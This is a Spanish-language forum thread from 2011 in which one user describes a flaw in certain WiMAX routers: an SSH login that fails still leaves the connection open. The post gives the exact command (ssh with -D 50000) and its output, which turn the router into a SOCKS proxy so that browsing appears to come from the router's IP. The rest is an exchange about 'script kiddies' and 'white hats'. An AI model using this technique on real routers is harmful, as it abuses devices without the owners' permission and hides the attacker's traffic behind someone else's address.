Calificación:
  • 1 voto(s) - 5 Media
  • 1
  • 2
  • 3
  • 4
  • 5
A nadie le importa una mierda, pero... v12
(07-09-2011, 08:06 PM)Reboot escribió:
(07-09-2011, 07:50 PM)Reaper45 escribió: vulnerabilidad en routers Wimax

Esos son los que da telefónica, ¿no? ¿No se supone que las últimas versiones del firmware lo habían arreglado?

Nop. No hablamos de lo mismo. Y no creo que Telefónica tenga presencia en Baréin xD.

La vulnerabilidad es muy sencilla.

Spoiler: mostrar
Cuando intentas acceder por SSH, puedes poner un user/pass erróneo, que el servidor te lo pide de nuevo, pero lo hace usando un programa interno, lo que significa que el canal ya está abierto y ha dado el login SSH por válido aunque aparentemente aún no puedas hacer nada. Esto es una tontería, porque la especificación SSH te permite que la uses de proxy para conexiones cuando ya te has logueado. Tiene toda la pinta de que eso se le pasó al ingeniero.

Se hace así:

Código:
root@Reaper# ssh loquesea@iprouter -D 50000
The authenticity of host '[IP] ([IP])' can't be established.

RSA key fingerprint is 08:f6:5d:0c:75:3e:71:a5:8e:ea:68:4f:41:ef:ec:73.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'iprouter' (RSA) to the list of known hosts.
loquesea@iprouter's password:
login failed: please enter correct username and password
Login:

Ahora tienes un proxy socks ejecutándose en el puerto 50000 en localhost, con configurar firefox para usarlo todas las conexiones que se hagan aparecerán con la IP del router.

(07-09-2011, 10:46 PM)Yumichan escribió: Me pregunto cuanto de esa vuelta al mundo vitual se debe a super conocimientos juaker lulz y cuanto a un directorio llamado "Tus primeras incursiones como script-kiddie"

Seré breve, ya que no me gusta explicarme y no sería la primera vez.

Bueno, pues digamos que la inspiración viene a ratos y que pocas veces es necesaria. De todas formas, yo llamo script-kiddie a los attention whores que fanfarronean, hacen defaces, tienen botnets para DDoS, que no saben hacer nada solos, no aportan nada y que, eventualmente, son cazados.

Personalmente encuentro muy divertido trastear con nuevos sistemas, a ver qué me encuentro, y después hacer el ninja y desaparecer sin tocar nada. ¿Para qué me voy a molestar en nada más? La gente no suele responder bien a ello.

A eso es a lo que se expone un "sombrero blanco", a que le llamen terrorista y/o script kiddie mientras observa cómo un elefante rosa gigantesco se bebe el café de la persona con la que está hablando sin que ésta se dé cuenta.
[Imagen: z4kSKUd.png]


Mensajes en este tema
Post Reply - por Fatimasiddd - 11-07-2011, 02:14 AM
RE: Post Reply - por Reboot - 11-07-2011, 09:32 AM
RE: A nadie le importa una mierda, pero... v12 - por Reaper45 - 07-10-2011, 04:50 PM

Salto de foro:


Usuarios navegando en este tema: 9 invitado(s)